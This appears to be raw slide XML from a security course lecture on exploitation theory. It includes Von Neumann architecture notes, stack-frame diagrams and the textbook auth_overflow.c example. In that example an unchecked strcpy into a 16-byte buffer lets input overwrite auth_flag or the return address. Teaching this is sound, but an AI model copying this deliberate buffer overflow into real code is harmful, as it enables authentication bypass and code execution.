            <a:off y="1757700" x="47227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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>auth_flag variable</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password_buffer variable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>saved frame pointer (SFP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>return address (ret)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>*password(function argument)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>------------------------------</a:t>
            </a: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Font typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>main()'s stack frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="377" name="Shape 377"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1757700" x="11413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password_buffer variable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>auth_flag variable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>saved frame pointer (SFP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"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*password(function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rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="378" name="Shape 378"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1712900" x="3341750"/>
            <a:ext cy="314700" cx="1266300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>[low memory]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="379" name="Shape 379"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="6208700" x="3341750"/>
            <a:ext cy="314700" cx="1266300"/>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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="384" name="Shape 384"/>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Toy example solution...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="385" name="Shape 38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Clr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>Example was from HAOE book (pages 122-126)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>auth_overflow.c	versus	auth_overflow2.c	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>int check_auth(char *password){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>int auth_flag = 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>  char password_buffer[16];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>strcpy(password_buffer, password);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>  return auth_flag;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="386" name="Shape 386"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2279988" x="5034000"/>
            <a:ext cy="889800" cx="4110000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Here's </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" lang="en" i="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> trick:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data writes this direction in  source code in vanilla systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="387" name="Shape 387"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off y="2813825" x="4757400"/>
            <a:ext cy="2390999" cx="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="114300" cap="flat">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="dot"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxn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86"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="386"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn presetID="10" fill="hold" presetSubtype="0" presetClass="entr" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="387"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">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Exploitation Theory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="Shape 10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u="sng" b="1" lang="en"/>
              <a:t>VON NEUMANN ARCHITECTURE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1" indent="-342900" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng" lang="en"/>
              <a:t>most popular system model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="2" indent="-342900" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng" lang="en"/>
              <a:t>45+ years old and going strong</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1" indent="-342900" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cannot distinguish between data </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp; instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="2" indent="-342900" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>major reason for so much hacking</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1" indent="-342900" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>instructions and data stores in same </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1" indent="-342900" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>allows for self modifying code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="2" indent="-342900" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>b/c old machines were hard to set up!!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="3" indent="-342900" marL="1828800">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>took weeks to set up an old ENIAC!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="4" indent="-342900" marL="2286000">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="128571"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>systems are different now, but much much more </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" b="1" sz="1400" lang="en" i="1"/>
              <a:t>complex</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1" indent="-342900" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The ability to treat instructions as data </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>allows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>assemblers, compilers, and other automated programming tools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> to exist</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="0" marL="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FANTASTIC READ: </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" sz="1200" lang="en">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.nytimes.com/2012/10/30/science/rethinking-the-computer-at-80.html?pagewanted=all&amp;_r=0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="103" name="Shape 103"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off y="1704688" x="5668993"/>
            <a:ext cy="2210509" cx="3017806"/>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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="392" name="Shape 392"/>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Targeting the stack frame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="393" name="Shape 393"/>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back to the auth_overflow2.c (page 126 in HAOE)</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b="1" sz="1400" lang="en"/>
              <a:t>int check_auth(char *password){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>  char password_buffer[16];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>  int auth_flag = 0;  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>  strcpy(password_buffer, password);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>  return auth_flag;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" sz="1400" lang="en"/>
              <a:t>int main(int argc, char *argv[]){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
